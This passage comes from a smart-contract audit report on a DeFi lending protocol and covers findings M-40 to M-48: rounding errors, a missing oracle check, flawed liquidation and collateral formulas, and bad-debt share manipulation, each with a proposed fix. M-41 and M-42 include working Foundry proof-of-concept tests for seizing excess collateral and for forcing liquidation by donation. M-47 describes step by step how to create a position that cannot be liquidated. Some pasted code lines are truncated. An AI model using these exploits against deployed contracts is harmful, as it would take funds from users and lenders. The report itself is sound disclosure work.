        (uint256 accruedInterest,) = simulateAccrue(pool);
        // [ROUND] round up to enable enable complete debt repayment
        return _convertToAssets(
            pool.totalBorrowAssets + accruedInterest,
>            Math.Rounding.Up

Same happens in repay function:

    function repay(uint256 poolId, address position, uint256 amt) external returns (uint256 remainingShares) {
        remainingShares = borrowSharesOf[poolId][position] - borrowShares;
        if (remainingShares > 0) {
            uint256 newBorrowAssets = _convertToAssets(
>               remainingShares, pool.totalBorrowAssets - amt, pool.totalBorrowShares - borrowShares, Math.Rounding.Down
            if (_getValueOf(pool.asset, newBorrowAssets) < minDebt) {
                revert Pool_DebtTooLow(poolId, pool.asset, newBorrowAssets);


This represents a notable instance of a rounding error, and although it is not a frequent occurrence, it can cause borrow or repay operations to unjustly revert with the Pool_DebtTooLow error.

Code Snippet

Tool used

Manual Review


Adjust the rounding method to Math.Rounding.Up when calculating newBorrowAssets.

In borrow function:

    function borrow(uint256 poolId, address position, uint256 amt) external returns (uint256 borrowShares) {
        uint256 newBorrowAssets = _convertToAssets(
            borrowSharesOf[poolId][position] + borrowShares,
            pool.totalBorrowAssets + amt,
            pool.totalBorrowShares + borrowShares,
-           Math.Rounding.Down
+           Math.Rounding.Up
        if (_getValueOf(pool.asset, newBorrowAssets) < minDebt) {
            revert Pool_DebtTooLow(poolId, pool.asset, newBorrowAssets);

In repay function:

    function repay(uint256 poolId, address position, uint256 amt) external returns (uint256 remainingShares) {
        remainingShares = borrowSharesOf[poolId][position] - borrowShares;
        if (remainingShares > 0) {
            uint256 newBorrowAssets = _convertToAssets(
-               remainingShares, pool.totalBorrowAssets - amt, pool.totalBorrowShares - borrowShares, Math.Rounding.Down
+               remainingShares, pool.totalBorrowAssets - amt, pool.totalBorrowShares - borrowShares, Math.Rounding.Up
            if (_getValueOf(pool.asset, newBorrowAssets) < minDebt) {
                revert Pool_DebtTooLow(poolId, pool.asset, newBorrowAssets);

Issue M-40: Lack of oracle validation in acceptLtvUpdate can result in a DoS for the Pool-Asset pair


Found by



The RiskEngine.sol allows pool owners to request LTV updates with a 72-hour timelock. However, while the requestLtvUpdate function checks for a valid oracle, the acceptLtvUpdate function does not. This could lead to a situation where an LTV update is accepted after the oracle has been removed or invalidated, resulting in DoS for the Pool-Asset pair.

Vulnerability Detail

Pool owners can update LTV parameters using the requestLtvUpdate function, which employs a 72-hour timelock before the LTV change takes effect. During the request phase, the function ensures a valid oracle is set for the asset:

        // set oracle before ltv so risk modules don't have to explicitly check if an oracle exists
        if (oracleFor[asset] == address(0)) revert RiskEngine_NoOracleFound(asset);

After the timelock, the pool owner can accept this request via the acceptLtvUpdate function. However, given the 72-hour delay, there is a possibility that the protocol's admin could remove or change the oracle for the asset. The acceptLtvUpdate function does not re-check the oracle's validity before updating the LTV:

    function acceptLtvUpdate(uint256 poolId, address asset) external {
        if (msg.sender != pool.ownerOf(poolId)) revert RiskEngine_OnlyPoolOwner(poolId, msg.sender);

        LtvUpdate memory ltvUpdate = ltvUpdateFor[poolId][asset];

        // revert if there is no pending update
        if (ltvUpdate.validAfter == 0) revert RiskEngine_NoLtvUpdate(poolId, asset);

        // revert if called before timelock delay has passed
        if (ltvUpdate.validAfter > block.timestamp) revert RiskEngine_LtvUpdateTimelocked(poolId, asset);

        // revert if timelock deadline has passed
        if (block.timestamp > ltvUpdate.validAfter + TIMELOCK_DEADLINE) {
            revert RiskEngine_LtvUpdateExpired(poolId, asset);

        // apply changes
        ltvFor[poolId][asset] = ltvUpdate.ltv;
        delete ltvUpdateFor[poolId][asset];
        emit LtvUpdateAccepted(poolId, asset, ltvUpdate.ltv);

If the LTV is updated for an asset without an oracle, the getAssetValue function, which fetches the asset's price from the oracle, will always revert, resulting in a DoS for the given Pool-Asset pair.


If the LTV is updated for an asset without an oracle, it will cause a DoS for the affected Pool-Asset pair, as any attempts to fetch the asset's value will revert.

Code Snippet

Tool used

Manual Review


Re-check the validity of the oracle for the asset upon accepting the ltv update:

    function acceptLtvUpdate(uint256 poolId, address asset) external {
        if (msg.sender != pool.ownerOf(poolId)) revert RiskEngine_OnlyPoolOwner(poolId, msg.sender);

+       if (oracleFor[asset] == address(0)) revert RiskEngine_NoOracleFound(asset);
        LtvUpdate memory ltvUpdate = ltvUpdateFor[poolId][asset];

        // revert if there is no pending update
        if (ltvUpdate.validAfter == 0) revert RiskEngine_NoLtvUpdate(poolId, asset);

        // revert if called before timelock delay has passed
        if (ltvUpdate.validAfter > block.timestamp) revert RiskEngine_LtvUpdateTimelocked(poolId, asset);

        // revert if timelock deadline has passed
        if (block.timestamp > ltvUpdate.validAfter + TIMELOCK_DEADLINE) {
            revert RiskEngine_LtvUpdateExpired(poolId, asset);

        // apply changes
        ltvFor[poolId][asset] = ltvUpdate.ltv;
        delete ltvUpdateFor[poolId][asset];
        emit LtvUpdateAccepted(poolId, asset, ltvUpdate.ltv);

Issue M-41: User's can seize more assets during liquidation by using type(uint).max


Found by

A2-security, Brenzee, EgisSecurity, hash, serial-coder, sl1


User's can seize more assets during liquidation than what should be actually allowed by replaying the repayment amount using type(uint).max

Vulnerability Detail

The liquidators are restricted on the amount of collateral they can seize during a liquidation

Eg: if a position has 1e18 worth debt, and 2e18 worth collateral, then on a liquidation the user cannot seize 2e18 collateral by repaying the 1e18 debt, and they are limited to seizing for ex. 1.3e18 worth of collateral (depends on the liquidation discount how much profit a liquidator is able to generate)

The check for this max seizable amount is kept inside _validateSeizedAssetValue


    function _validateSeizedAssetValue(
        address position,
        DebtData[] calldata debtData,
        AssetData[] calldata assetData,
        uint256 discount
    ) internal view {
        // compute value of debt repaid by the liquidator
        uint256 debtRepaidValue;
        uint256 debtLength = debtData.length;
        for (uint256 i; i < debtLength; ++i) {
            uint256 poolId = debtData[i].poolId;
            uint256 amt = debtData[i].amt;
            if (amt == type(uint256).max) amt = pool.getBorrowsOf(poolId, position);
            address poolAsset = pool.getPoolAssetFor(poolId);
            IOracle oracle = IOracle(riskEngine.getOracleFor(poolAsset));
            debtRepaidValue += oracle.getValueInEth(poolAsset, amt);


        uint256 maxSeizedAssetValue = debtRepaidValue.mulDiv(1e18, (1e18 - discount));
        if (assetSeizedValue > maxSeizedAssetValue) {
            revert RiskModule_SeizedTooMuch(assetSeizedValue, maxSeizedAssetValue);

But the _validateSeizedAssetValue is flawed as it assumes that the value type(uint256).max will result in the liquidator repaying the current pool.getBorrowsOf(poolId, position) value. In the actual execution, an attacker can repay some amount earlier and then use type(uint256).max on the same pool which will result in a decreased amount because debt has been repaid earlier

Eg: getBorrows of position = 1e18 user passes in 0.9e18 and type(uint).max as the repaying values the above snippet will consider it as 0.9e18 + 1e18 being repaid and hence allow for more than 1.9e18 worth of collateral to be seized but during the actual execution, since 0.9e18 has already been repaid, only 0.1e18 will be transferred from the user allowing the user

POC Code

Apply the following diff and run testHash_LiquidateExcessUsingDouble. It is asserted that a user can use this method to seize the entire collateral of the debt position even though it results in a much higher value than what should be actually allowed

diff --git a/protocol-v2/test/integration/LiquidationTest.t.sol b/protocol-v2/test/integration/LiquidationTest.t.sol
index beaca63..29e674a 100644
--- a/protocol-v2/test/integration/LiquidationTest.t.sol
+++ b/protocol-v2/test/integration/LiquidationTest.t.sol
@@ -48,6 +48,85 @@ contract LiquidationTest is BaseTest {

+    function testHash_LiquidateExcessUsingDouble() public {
+        vm.startPrank(user);
+        asset2.approve(address(positionManager), 1e18);
+        // deposit 1e18 asset2, borrow 1e18 asset1
+        Action[] memory actions = new Action[](7);
+        (position, actions[0]) = newPosition(user, bytes32(uint256(0x123456789)));
+        actions[1] = deposit(address(asset2), 1e18);
+        actions[2] = addToken(address(asset2));
+        actions[3] = borrow(fixedRatePool, 1e18);
+        actions[4] = approve(address(mockswap), address(asset1), 1e18);
+        bytes memory data = abi.encodeWithSelector(SWAP_FUNC_SELECTOR, address(asset1), address(asset2), 1e18);
+        actions[5] = exec(address(mockswap), 0, data);
+        actions[6] = addToken(address(asset3));
+        positionManager.processBatch(position, actions);
+        vm.stopPrank();
+        assertTrue(riskEngine.isPositionHealthy(position));
+        (uint256 totalAssetValue, uint256 totalDebtValue, uint256 minReqAssetValue) = riskEngine.getRiskData(position);
+        assertEq(totalAssetValue, 2e18);
+        assertEq(totalDebtValue, 1e18);
+        assertEq(minReqAssetValue, 2e18);
+        // modify asset2 price from 1eth to 0.9eth
+        // now there is 1e18 debt and 1.8e18 worth of asset2
+        FixedPriceOracle pointOneEthOracle = new FixedPriceOracle(0.9e18);
+        vm.prank(protocolOwner);
+        riskEngine.setOracle(address(asset2), address(pointOneEthOracle));
+        assertFalse(riskEngine.isPositionHealthy(position));
+        // maximumSeizable amount with liquidation discount : 1388888888888888888 ie. 1.38e18
+        uint liquidationDiscount = riskEngine.riskModule().LIQUIDATION_DISCOUNT();
+        uint supposedMaximumSeizableAssetValue = totalDebtValue * 1e18 / (1e18 - liquidationDiscount);
+        uint maximumSeizableAssets = supposedMaximumSeizableAssetValue * 1e18 / 0.9e18;
+        assert(maximumSeizableAssets == 1388888888888888888);
+        DebtData memory debtData = DebtData({ poolId: fixedRatePool, amt: 1e18 });
+        DebtData[] memory debts = new DebtData[](1);
+        debts[0] = debtData;
+        // verifying that attempting to seize more results in a revert
+        // add dust to cause minimal excess
+        AssetData memory asset2Data = AssetData({ asset: address(asset2), amt: maximumSeizableAssets + 10 });
+        AssetData[] memory assets = new AssetData[](1);
+        assets[0] = asset2Data;
+, 10e18);
+        vm.startPrank(liquidator);
+        asset1.approve(address(positionManager), 1e18);
+        // seizeAttempt value : 1250000000000000008, seizable value : 1250000000000000000
+        vm.expectRevert(abi.encodeWithSelector(RiskModule.RiskModule_SeizedTooMuch.selector, 1250000000000000008, 1250000000000000000));
+        positionManager.liquidate(position, debts, assets);
+        vm.stopPrank();
+        // but an attacker can liquidate almost double by exploiting the type.max issue
+        debtData = DebtData({ poolId: fixedRatePool, amt: 0.9e18 });
+        debts = new DebtData[](2);
+        debts[0] = debtData;
+        // replay the balance value. this will cause the repaid amount to be double counted allowing the user to liquidate the entire assets
+        debtData = DebtData({ poolId: fixedRatePool, amt: type(uint256).max });
+        debts[1] = debtData;
+        // liquidate full asset balance
+        asset2Data = AssetData({ asset: address(asset2), amt: 2e18 });
+        assets = new AssetData[](1);
+        assets[0] = asset2Data;
+        // liquidate
+        vm.startPrank(liquidator);
+        asset1.approve(address(positionManager), 1e18);
+        positionManager.liquidate(position, debts, assets);
+        vm.stopPrank();
+    }
     function testLiquidate() public {
         asset2.approve(address(positionManager), 1e18);


Borrowers will loose excess collateral during liquidation

Code Snippet

Tool used

Manual Review


Only allow a one entry for each poolId in the debtData array. This can be enforced by checking that the array is in a strictly sequential order on pools

Issue M-42: Formula used for minimum required collateral value is flawed


Found by



The formula that is used to calculate the minimum required collateral value for a position is flawed and allows attackers to liquidate user's by donating assets

Vulnerability Detail

A position is considered non-healthy ie. liquidateable when the collateral value is less than minReqAssetValue


    function isPositionHealthy(address position) public view returns (bool) {


        uint256 minReqAssetValue =
            _getMinReqAssetValue(debtPools, debtValueForPool, positionAssets, positionAssetWeight, position);
        return totalAssetValue >= minReqAssetValue; // (non-zero debt, non-zero assets)

Where minReqAssetValue is calculated as follows: link

    function _getMinReqAssetValue(
        uint256[] memory debtPools,
        uint256[] memory debtValuleForPool,
        address[] memory positionAssets,
        uint256[] memory wt,
        address position
    ) internal view returns (uint256) {


        for (uint256 i; i < debtPoolsLength; ++i) {
            for (uint256 j; j < positionAssetsLength; ++j) {


                minReqAssetValue += debtValuleForPool[i].mulDiv(wt[j], ltv, Math.Rounding.Up);

Here wt[j] is the weight of the collateral token by value ie. if in a pool there is 1 worth of collateral A and 1 worth of collateral B, then both have weights as 0.5,0.5. ltv is the loan to value ratio.

This method of calculation of minReqAssetValue is flawed as it can allow an attacker to donate and increase balance of the lower ltv token causing higher portion of the debt to be assigned to the lower ltv token which can increase the minReqAssetValue in a way such that it is not covered by the donated amount

Eg: all tokens prices = 1 ltv a = 20%, ltv b = 80% initial collateral amounts: 40a, 160b (2:8) debt amount = 100 currently healthy position, minReqAssetValue = (100 0.2 / 0.2) + (100 0.8 / 0.8) == 200 == collateral value

attacker donates 1 token a now token weights = 41:160 now minReqAssetValue = (100 (41/201) / 0.2 ) + (100 (160/201) / 0.8) == 201.492537313 while collateral value == 200 + 1 == 201

hence liquidateable

attacker can now liquidate the position making a profit with the 10% liquidation discount

POC Code

Apply the following diff and run testHash_LiquidatePositionByDonation. It is asserted that a pool that was healthy can be made liquidateable by an attacker by making a donation which will be covered by their profit

diff --git a/protocol-v2/test/integration/LiquidationTest.t.sol b/protocol-v2/test/integration/LiquidationTest.t.sol
index beaca63..4dcd863 100644
--- a/protocol-v2/test/integration/LiquidationTest.t.sol
+++ b/protocol-v2/test/integration/LiquidationTest.t.sol
@@ -33,9 +33,9 @@ contract LiquidationTest is BaseTest {

-        riskEngine.requestLtvUpdate(fixedRatePool, address(asset3), 0.5e18); // 2x lev
+        riskEngine.requestLtvUpdate(fixedRatePool, address(asset3), 0.8e18); // 2x lev
         riskEngine.acceptLtvUpdate(fixedRatePool, address(asset3));
-        riskEngine.requestLtvUpdate(fixedRatePool, address(asset2), 0.5e18); // 2x lev
+        riskEngine.requestLtvUpdate(fixedRatePool, address(asset2), 0.2e18); // 2x lev
         riskEngine.acceptLtvUpdate(fixedRatePool, address(asset2));

@@ -48,6 +48,43 @@ contract LiquidationTest is BaseTest {

+    function testHash_LiquidatePositionByDonation() public {
+        // asset 1,2,3 price = 1 and asset 2 ltv = 0.2 and asset 3 ltv = 0.8
+        // borrow 100 debt and put asset2:asset3 collateral value in 2:8
+        // setup tokens
+        {
+            uint256 asset2CollateralAmount = 40e18;
+            uint256 asset3CollateralAmount = 160e18;
+  , asset2CollateralAmount);
+  , asset3CollateralAmount);
+            vm.startPrank(user);
+            asset2.approve(address(positionManager), asset2CollateralAmount);
+            asset3.approve(address(positionManager), asset3CollateralAmount);
+            Action[] memory actions = new Action[](6);
+            (position, actions[0]) = newPosition(user, bytes32(uint256(0x123456789)));
+            actions[1] = deposit(address(asset2), asset2CollateralAmount);
+            actions[2] = deposit(address(asset3), asset3CollateralAmount);
+            actions[3] = addToken(address(asset2));
+            actions[4] = addToken(address(asset3));
+            actions[5] = borrow(fixedRatePool, 100e18);
+            positionManager.processBatch(position, actions);
+            vm.stopPrank();
+        }
+        assertTrue(riskEngine.isPositionHealthy(position));
+        //attacker deposits 1 more asset2, makes the position liquidateable and liquidates the position
+        address attacker = address(0xd33d33);
+        vm.prank(attacker);
+        asset2.transfer(position,1e18);
+        assertTrue(!riskEngine.isPositionHealthy(position));
+        // attacker can liquidate 100e18 debt for a liquidation profit of 10% making a net profit
+    }
     function testLiquidate() public {
         asset2.approve(address(positionManager), 1e18);


User's can be liquidated by attackers even when they have maintained enough collateral value

Code Snippet

Tool used

Manual Review


Issue M-43: Attacker can inflict losses to other Superpool user's during a bad debt liquidation depending on the deposit/withdraw queue order


Found by



Attacker can inflict losses to other Superpool user's during a bad debt liquidation depending on the deposit/withdraw queue order

Vulnerability Detail

On bad debt liquidation the underlying BasePool depositors eats losses

    function rebalanceBadDebt(uint256 poolId, address position) external {


        pool.totalDepositAssets = (totalDepositAssets > borrowAssets) ? totalDepositAssets - borrowAssets : 0;

In a superpool this allows an attacker to inflict more losses to others depending on the deposit/withdraw pool order without suffering any losses for himself if he can deposit more assets in the to be affected pool and withdraw from another pool

    function reorderDepositQueue(uint256[] calldata indexes) external onlyOwner {
        if (indexes.length != depositQueue.length) revert SuperPool_QueueLengthMismatch(address(this));
        depositQueue = _reorderQueue(depositQueue, indexes);

    /// @notice Reorders the withdraw queue, based in withdraw priority
    /// @param indexes The new withdrawQueue, in order of priority
    function reorderWithdrawQueue(uint256[] calldata indexes) external onlyOwner {
        if (indexes.length != withdrawQueue.length) revert SuperPool_QueueLengthMismatch(address(this));
        withdrawQueue = _reorderQueue(withdrawQueue, indexes);

Eg: poolA = 100 value, 100shares poolB = 100 value, 100shares superPool deposit order [poolA,poolB] superPool withdraw order [poolB,poolA] superPool balance = 100 value, all deposited in poolB bad debt liqudiation of 100 for poolA is about to happen attacker deposits 100 value in superpool and withdraws 100 attacker suffers no loss now superPool has entire balance in poolA poolA = 200value , 200 shares after bad debt liquidation, poolA = 100 value,200shares this loss is beared by the other superpool depositors


Attacker can inflict losses to other superpool depositors

Code Snippet

Tool used

Manual Review


Monitor for bad debt and manage the bad debt pool

Issue M-44: feeRecipeint lacks setter function


Found by



feeRecipeint lacks setter function

Vulnerability Detail

The feeRecipient variable of Pool.sol is intended to be updated but lacks a setter function and hence cannot be updated


feeRecipient cannot be updated

Code Snippet

Tool used

Manual Review


Add a setter function

Issue M-45: Incorrect decimal adjustment in ChainlinkUsdOracle


Found by

0x5chn0uf, 0xAlix2, A2-security, Chad0, JCN, KupiaSec, Obsidian, Ryonen, Tendency, ZeroTrust, admin, cawfree, chaduke, codertjay, h2134, hash, robertodf, tvdung94


Incorrect decimal adjustment in ChainlinkUsdOracle

Vulnerability Detail

When adjusting for the decimals, the bracks are ommitted causing incorrect division

    function getValueInEth(address asset, uint256 amt) external view returns (uint256) {


        if (decimals <= 18) return (amt * 10 ** (18 - decimals)).mulDiv(uint256(assetUsdPrice), uint256(ethUsdPrice));
=>      else return (amt / (10 ** decimals - 18)).mulDiv(uint256(assetUsdPrice), uint256(ethUsdPrice));

Eg: Decimals was 19, then instead of dividing by 10(19-18), the division will be performed by ~1019 itself. Casuing massive loss in the value


Incorrect valuation of assets breaking every calculation dependent on it, for eg: debt valuation,collateral valuation etc.

Code Snippet

Tool used

Manual Review


Change to 10 ** (decimals - 18)

Issue M-46: New depositors can loose their assets due to existing shares when totalAssets is 0 following a bad debt rebalance


Found by

Nihavent, S3v3ru5, hash


New depositors can loose their assets due to existing shares even when totalAssets is 0

Vulnerability Detail

Having 0 totalAssets and non-zero shares is a possible scenario due to rebalacne

    function rebalanceBadDebt(uint256 poolId, address position) external {

        //@auidt decreases totalDepositAssets while shares can be non-zero
        uint256 totalDepositAssets = pool.totalDepositAssets;
        pool.totalDepositAssets = (totalDepositAssets > borrowAssets) ? totalDepositAssets - borrowAssets : 0;

In such a case, if a new user deposits, it will not revert but instead mint shares 1:1 with the assets. But as soon as it is minted, the value of the user's share will decrease because of the already existing shares

    function deposit(uint256 poolId, uint256 assets, address receiver) public returns (uint256 shares) {


        shares = _convertToShares(assets, pool.totalDepositAssets, pool.totalDepositShares, Math.Rounding.Down);
    function _convertToShares(
        uint256 assets,
        uint256 totalAssets,
        uint256 totalShares,
        Math.Rounding rounding
    ) internal pure returns (uint256 shares) {
        if (totalAssets == 0) return assets;
        shares = assets.mulDiv(totalShares, totalAssets, rounding);

Eg: deposit shares = 100, deposit assets = 100, borrow assets = 100 borrow position becomes bad debt and rebalance bad debt is invoked now deposit shares = 100, deposit assets = 0 new user calls deposit with 100 assets they get 100 shares in return but share value is now 0.5 and they can withdraw only 50

This can occur if a large position undergoes a rebalance and the others manage to withdraw their assets right before the rebalance (superpool dominated pools can higher chances of such occurence)


Users can loose their assets when depositing to pools that have freshly undergone rebalanceBadDebt

Code Snippet

Tool used

Manual Review


If totalShares is non-zero and totalAssets is zero, revert for deposits

Issue M-47: User's can create non-liquidateable positions by leveraging rebalanceBadDebt to decrease share price


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User's can create non-liquidateable positions by leveraging rebalanceBadDebt to decrease share price

Vulnerability Detail

The rebalanceBadDebt function decreases the deposit assets while the deposit shares are kept the same

    function rebalanceBadDebt(uint256 poolId, address position) external {


        // rebalance bad debt across lenders
        pool.totalBorrowShares = totalBorrowShares - borrowShares;
        // handle borrowAssets being rounded up to be greater than totalBorrowAssets
        pool.totalBorrowAssets = (totalBorrowAssets > borrowAssets) ? totalBorrowAssets - borrowAssets : 0;
        uint256 totalDepositAssets = pool.totalDepositAssets;
        pool.totalDepositAssets = (totalDepositAssets > borrowAssets) ? totalDepositAssets - borrowAssets : 0;
        borrowSharesOf[poolId][position] = 0;

The deflates the value of a depositors share and hence a deposit afterwards will lead to a massive amount of shares being minted. An attacker can leverage this to create pools such that the total share amount will become ~type(uint.max). After this any query to many of the pool's functions including getBorrowsOf will revert due to the overflow. This can be used to create positions that borrow from other pools and cannot be liquidated

Eg: attacker creates a pool for with with 1e18 assets and 1e18 shares attacker borrows 1e18 - 1. the position goes into bad debt and rebalanceBadDebt is invoked now assets left = 1 and shares = 1e18 attacker deposits 1e18 tokens and gets 1e36 tokens in return attacker repeates the process by borrowing 1e18 tokens, being in bad debt, getting rebalanceBadDebt invoked and delfating the share value

since the attacker has full control over the increase by choosing the deposit amount, they can make it reach a value near type(uint).max followed by a borrow from this infected pool and from other pools from which they attacker really wanted to borrow after some time, the interest increase will make the corresponding fee share cause overflow for the pool shares and hence the getBorrowsOf and isPositionHealthy functions to revert preventing liquidations of the attackers position


User's can create unliquidateable positions and make protocol accrue bad debt/depositors from other pools loose assets

Code Snippet

Tool used

Manual Review


Can't think of any good solution if a position has to have the ability to borrow from multiple pools using the same collateral backing

Issue M-48: Calculation issue will impact in loss in user funds and DOS


Found by



In withdraw function in pool.sol contract while calculating amount of shares it is rounding up which results in loss in user funds and DOS as user will not be able to fully withdraw the deposited assets and Superpool is also not compliant with ERC 4626.

Root Cause

The choice to round up on pool.sol:350 is a mistake as it results in loss of user funds and DOS as user can't withdraw the full asset amount. It also affects withdraw function in SuperPool.sol as underneath it calls withdraw function on pool.sol

Internal pre-conditions

It will happen in all scenarios after interest is accrued and peg is not 1:1 between assets and shares.

External pre-conditions

No response

Attack Path

  1. In testTimeIncreasesDebt test case after time is elapsed, debt is increased and interest is accrued if a user deposits funds and later tries to withdraw all the funds they are not able to withdraw it all due to issue in calculation


The user loose a part of deposited asset amount and can't withdraw the deposited amount fully causing withdraw function unusable to withdraw all assets and also cause the same DOS issue in superPool withdraw function.


In Pool.t.sol

function testTimeIncreasesDebt(uint96 assets) public {

        (,,,,,,, uint256 totalBorrowAssets, uint256 totalBorrowShares,,) = pool.poolDataFor(linearRatePool);
        console.log("totalBorrowAssets -> ", totalBorrowAssets);
        console.log("totalBorrowShares -> ", totalBorrowShares);

        uint256 time = block.timestamp + 1 days;
        vm.warp(time + 86_400 * 7);
        vm.roll(block.number + ((86_400 * 7) / 2));


        (,,,,,,, uint256 newTotalBorrowAssets, uint256 newTotalBorrowShares,,) = pool.poolDataFor(linearRatePool);
        console.log("newTotalBorrowAssets -> ", newTotalBorrowAssets);
        console.log("newTotalBorrowShares -> ", newTotalBorrowShares);
        console.log("shares first -> ", pool.balanceOf(user, linearRatePool));
        console.log("assets -> ",assets);

        (uint256 depositedEarlier) = pool.getAssetsOf(linearRatePool, user);
        console.log("assets in pool before ->", depositedEarlier);
        // (uint256 liquidity) = pool.getPoolAssetFor(linearRatePool);
        // console.log("total assets in pool ->", liquidity);

        vm.startPrank(user2);, assets);
        asset1.approve(address(pool), assets);
        (uint256 sharesBefore) = pool.deposit(linearRatePool, assets, user2);
        console.log("shares minted on deposit -> ", sharesBefore);
        (uint256 sharesAfter) = pool.withdraw(linearRatePool, assets, user2, user2);
        console.log("shares burned on withdraw -> ", sharesAfter);

        (uint256 deposited) = pool.getAssetsOf(linearRatePool, user);
        console.log("total assets deposited ->", deposited);

        assertEq(sharesBefore, sharesAfter);
        assertEq(newTotalBorrowShares, totalBorrowShares);
        assertGt(newTotalBorrowAssets, totalBorrowAssets);

In Superpool.t.sol

function testInterestEarnedOnTheUnderlingPool() public {
        // 1. Setup a basic pool with an asset1
        // 2. Add it to the superpool
        // 3. Deposit assets into the pool
        // 4. Borrow from an alternate account
        // 5. accrueInterest
        // 6. Attempt to withdraw all of the liquidity, and see the running out of the pool
        superPool.addPool(linearRatePool, 50 ether);
        superPool.addPool(fixedRatePool, 50 ether);

        vm.startPrank(user);, 50 ether);
        asset1.approve(address(superPool), 50 ether);

        superPool.deposit(0, user);

        superPool.deposit(50 ether, user);

        Pool(pool).borrow(linearRatePool, user, 35 ether);

        vm.warp(block.timestamp + 365 days);
        vm.roll(block.number + 5_000_000);

        vm.startPrank(user2);, 421 ether);
        asset1.approve(address(superPool), 421 ether);

        (uint256 sharesMinted) = superPool.deposit(421 ether, user2);
        console.log("Shares Minted ->", sharesMinted);
        (uint256 sharesBurned) = superPool.withdraw(421 ether, user2, user2);
        console.log("Shares Burned ->", sharesBurned);

        uint256 borrowsOwed = pool.getBorrowsOf(linearRatePool, user);, borrowsOwed);
        asset1.approve(address(pool), borrowsOwed);
        Pool(pool).repay(linearRatePool, user, borrowsOwed);


        vm.expectRevert(); // Not enough liquidity
        superPool.withdraw(40 ether, user, user);

        vm.expectRevert(); // Cant remove a pool with liquidity in it
        superPool.removePool(linearRatePool, false);


Changing Math.Rounding.Up to Mat.Rounding.Down in Pool.sol:350 solves the issue.